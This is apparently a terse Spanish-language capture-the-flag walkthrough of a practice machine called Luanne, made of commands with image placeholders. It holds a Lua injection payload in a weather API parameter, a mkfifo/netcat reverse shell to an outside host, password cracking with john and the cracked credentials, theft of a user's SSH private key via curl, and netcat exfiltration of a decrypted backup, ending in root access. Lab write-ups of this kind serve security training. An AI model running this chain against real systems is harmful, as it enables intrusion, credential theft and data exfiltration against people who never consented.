nmap -A -p- -oA output 10.129.151.88 --min-rate=10000 --script=vuln --script-imeout=15 -v

nmap -sC -sV -O -p- -oA luanne 10.129.151.88

nmap -sU -O -p- -oA luanne-udp 10.129.151.88

nikto -h 10.129.151.88 :80

Pasted image 20220203061033.png

Pasted image 20220203061301.png

whatweb http://10.129.151.88

Pasted image 20220203061715.png

http://10.129.151.88/robots.txt

Pasted image 20220203061938.png

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ

Pasted image 20220203062210.png

http://10.129.151.88/weather/forecast

Pasted image 20220203062258.png

curl -s -X GET "http://10.129.151.88/weather/forecast?city=London" | jq

Pasted image 20220203062419.png

Abrimos burpsuite y interceptamos

Pasted image 20220203062810.png

GET /weather/forecast?city=list

Pasted image 20220203062934.png

GET /weather/forecast?city=list']%3b+os.execute['id']--+-'

Pasted image 20220203063253.png

nc -lvnp 443

GET /weather/forecast?city=list']%3b+os.execute['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f']--+-'

Le hacemos Ctrl +U para ulrencode

Pasted image 20220203063808.png

cat .htpasswd

guardamos el webapi_user y su contrasena en un archivo llamado hash

john --wordlist=/usr/share/wordlists/rockyou..txt hash

Credenciales-> webapi_user:iamthebest

Pasted image 20220203064432.png

ps -auwx

Pasted image 20220203064825.png

curl -s -X GET http://127.0.0.1:3001

Pasted image 20220203065003.png

curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u 'webapi_user:iamthebest'; echo

Pasted image 20220203065528.png

Creamos un id_rsa

chmod 600 id_rsa

ssh -i id_rsa r.michaels@10.129.151.88

Pasted image 20220203070645.png

cd backups

cat devel_backup-2020-09-16.tar.gz.enc

Pasted image 20220203070922.png

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/backup.tar.gz

Pasted image 20220203071428.png

nc 10.10.14.21 < backup.tar.gz

nc -lvnp 443 > backup.tar.gz

Pasted image 20220203071950.png

cat .htpasswd

Pasted image 20220203072209.png

vim hash2

john --worldlist=/usr/share/worldlists/rockyou.txt hash2

Credenciales->root:littlebear

Pasted image 20220203072626.png

doas su root

Pasted image 20220203072727.png

boxes

copyright©2022 Cu3rv0x all rights reserved